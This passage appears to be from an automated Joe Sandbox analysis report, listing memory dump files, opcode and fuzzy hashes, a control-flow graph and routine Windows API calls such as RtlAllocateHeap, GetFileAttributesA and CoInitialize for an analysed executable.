                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                                                  • Opcode ID: 72bbcef252fdc8ac92ef642af371f700f4a01d84b37b9548d62ca657504f4630
                                                                                                                                                                                                                                                  • Instruction ID: 482e7b7e76c4449656136d2d7f32529103e5ad49a6017fa6a1cb8049fb48f7ef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72bbcef252fdc8ac92ef642af371f700f4a01d84b37b9548d62ca657504f4630
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0E1F470E002649BDB24BB28ED477AD7BE1EB45720F9442D8E4196B3D2DF354E808BC6

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 869 b5d82f-b5d83a 870 b5d83c-b5d846 869->870 871 b5d848-b5d84e 869->871 870->871 872 b5d87c-b5d887 call b575f6 870->872 873 b5d867-b5d878 RtlAllocateHeap 871->873 874 b5d850-b5d851 871->874 878 b5d889-b5d88b 872->878 875 b5d853-b5d85a call b59dc0 873->875 876 b5d87a 873->876 874->873 875->872 882 b5d85c-b5d865 call b58e36 875->882 876->878 882->872 882->873
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B5A813,00000001,00000364,00000006,000000FF,?,00B5EE3F,?,00000004,00000000,?,?), ref: 00B5D871
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 910de8f36c10e661f5eea59a9d638ce35addca7625cc489393c1f7101c4e3445
                                                                                                                                                                                                                                                  • Instruction ID: 87addc97507835b76f07af8f5bd13f3b8a0a5145bf0425c9da8ff06c86d8499e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 910de8f36c10e661f5eea59a9d638ce35addca7625cc489393c1f7101c4e3445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0E232601624A6EB312A72AC01B5B37D9DF95373B1882E1EC08E7181EE60EC0D86E0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00B2DA1D,?,?,?,?), ref: 00B287B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: 21dbb763b970d374fc568ab6fb6f56d72074ea88bd57ed5ad73ea9ea3eeefcb4
                                                                                                                                                                                                                                                  • Instruction ID: 64dbbfeb186ba5c629d40b9f5c074509099c57022cd32e10a1d3bc28846cd30e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21dbb763b970d374fc568ab6fb6f56d72074ea88bd57ed5ad73ea9ea3eeefcb4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DC08C2801362005FD1C153C21848A833C6D9877A87F41FC4E0794B2F1CA356C07A210
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00B2DA1D,?,?,?,?), ref: 00B287B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: dddbee7ed59a1688715590ddb8bebb45e069355bbff3ac903ab0a32ea880c70e
                                                                                                                                                                                                                                                  • Instruction ID: b8a6b01e5f8615d0b4576c0ca9d0c65d90ac46a309207ee0b30f5ff2beb3c929
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dddbee7ed59a1688715590ddb8bebb45e069355bbff3ac903ab0a32ea880c70e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65C08C3801322046FA1C5A3C61848243286EA437283F00FC8E03A4B2F1CB32DC03C6A0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B2B3C8
